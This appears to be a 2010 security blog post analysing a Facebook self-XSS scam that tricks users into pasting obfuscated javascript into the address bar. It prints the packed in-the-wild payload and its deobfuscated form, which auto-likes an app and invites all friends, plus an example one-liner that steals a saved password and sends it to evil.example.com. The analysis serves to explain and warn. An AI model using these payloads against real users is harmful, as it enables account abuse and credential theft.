Facebook social engineering XSS « Thoughts on Security

Facebook social engineering XSS

Found in the wild (http://www.facebook.com/pages/Teacher-asked-Why-do-Boys-Walk-faster-then-Girls-Girls-Talk-more-then-Boys/125748790772279) attempts to trick users by instructing them to type CTRL+C, to copy hidden javascript, then Alt+D to highlight the address bar to paste and run this javascript:

javascript:(function(){a='app121760014508794_iji';b='app121760014508794_aja';rew='app121760014508794_rew';qwe='app121760014508794_qwe';qtt='app121760014508794_qtt';eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return p}('P e=["\p\g\l\g\I\g\k\g\h\D","\l\h\D\k\f","\o\f\h\v\k\f\q\f\j\h\J\D\Q\x","\y\g\x\x\f\j","\g\j\j\f\z\R\K\L\S","\p\n\k\A\f","\l\A\o\o\f\l\h","\k\g\G\f\q\f","\l\k\g\j\G","\L\r\A\l\f\v\p\f\j\h\l","\t\z\f\n\h\f\v\p\f\j\h","\t\k\g\t\G","\g\j\g\h\v\p\f\j\h","\x\g\l\u\n\h\t\y\v\p\f\j\h","\l\f\k\f\t\h\w\n\k\k","\l\o\q\w\g\j\p\g\h\f\w\T\r\z\q","\H\n\U\n\V\H\l\r\t\g\n\k\w\o\z\n\u\y\H\g\j\p\g\h\f\w\x\g\n\k\r\o\W\u\y\u","\l\A\I\q\g\h\X\g\n\k\r\o","\g\j\u\A\h","\o\f\h\v\k\f\q\f\j\h\l\J\D\K\n\o\Y\n\q\f","\Z\y\n\z\f","\u\r\u\w\t\r\j\h\f\j\h"];d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);N=d[e[2]](e[8]);c=d[e[10]](e[9]);c[e[12]](e[11],E,E);s[e[13]](c);B(C(){1b[e[14]]()},O);B(C(){1c[e[17]](e[15],e[16]);B(C(){c[e[12]](e[11],E,E);N[e[13]](c);B(C(){F=M[e[19]](e[18]);1d(i 1e F){1f(F[i][e[5]]==e[1g]){F[i][e[13]](c)}};m[e[13]](c);B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];},1k)},1l)},1m)},O);',62,85,'||||||||||||||variables|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||qtt|fs|SocialGraphManager|for|in|if|20|qwe|rew|21|2000|4000|3000'.split('|'),0,{}))})();

______________________________________

Looks like the "Dean Edwards packing tool" And according to http://www.strictly-software.com/unpacker here is the unpacked code:
______________________________________

______________________________________

After writing a few js lines in firebug to dehex the variables:

outputstring="[";
for(var i=0;i<variables.length;i++)
outputstring+="""+variables[i]+"", ";alert(outputstring);

we get:

var variables = ["visibility", "style", "getElementById", "hidden", "innerHTML", "value", "suggest", "likeme", "slink", "MouseEvents", "createEvent", "click", "initEvent", "dispatchEvent", "select_all", "sgm_invite_form", "/ajax/social_graph/invite_dialog.php", "submitDialog", "input", "getElementsByTagName", "Share", "pop_content"];

and substitute the variables in the source:

for(var i=0;i<variables.length;i++)
src=src.replace(new RegExp('variables\['+i+'\]','g'), '"'+variables[i]+'"')

we get a well-deobfuscated source:
______________________________________

d = document;
d["getElementById"](qtt)["style"]["visibility"] = "hidden";
d["getElementById"](a)["innerHTML"] = d["getElementById"](b)["value"];
s = d["getElementById"]("suggest");
m = d["getElementById"]("likeme");
sl = d["getElementById"]("slink");
c = d["createEvent"]("MouseEvents");
c["initEvent"]("click", true, true);
s["dispatchEvent"](c);
setTimeout(function () {
fs["select_all"]()
},
5000);
setTimeout(function () {
SocialGraphManager["submitDialog"]("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
setTimeout(function () {
c["initEvent"]("click", true, true);
sl["dispatchEvent"](c);
setTimeout(function () {
inp = document["getElementsByTagName"]("input");
for (i in inp) {
if (inp[i]["value"] == "Share") {
inp[i]["dispatchEvent"](c)
}
};
m["dispatchEvent"](c);
setTimeout(function () {
d["getElementById"](qwe)["innerHTML"] = d["getElementById"](rew)["value"];
},
2000)
},
4000)
},
3000)
},5000);

Which clearly invokes, by simulated mouse click, liking the app and suggesting the app to all your friends. It could be worse, and steal your password if you have it saved on the login page:

javascript:(function(){var ifr = document.createElement(“iframe”);ifr.src=”/login.php”;ifr.height=0;ifr.width=0;document.body.appendChild(ifr);setTimeout(function(){var mypass=ifr.contentWindow.document.getElementById(“pass”).value;new Image().src=”http://evil.example.com/evil.php?pass=”+mypass;alert(“Your password is “+mypass+” and I just sent it to evil.example.com”);},1000);})();

or send you exploits or defriend all your friends… Maybe people will use this as a learning opportunity so if something actually bad does happen, they won’t get hit.

This entry was posted on May 11, 2010, 6:43 pm and is filed under webapps. You can follow any responses to this entry through RSS 2.0. Both comments and pings are currently closed.

Thoughts on Security

Facebook social engineering XSS

Featured Posts

Categories

Archives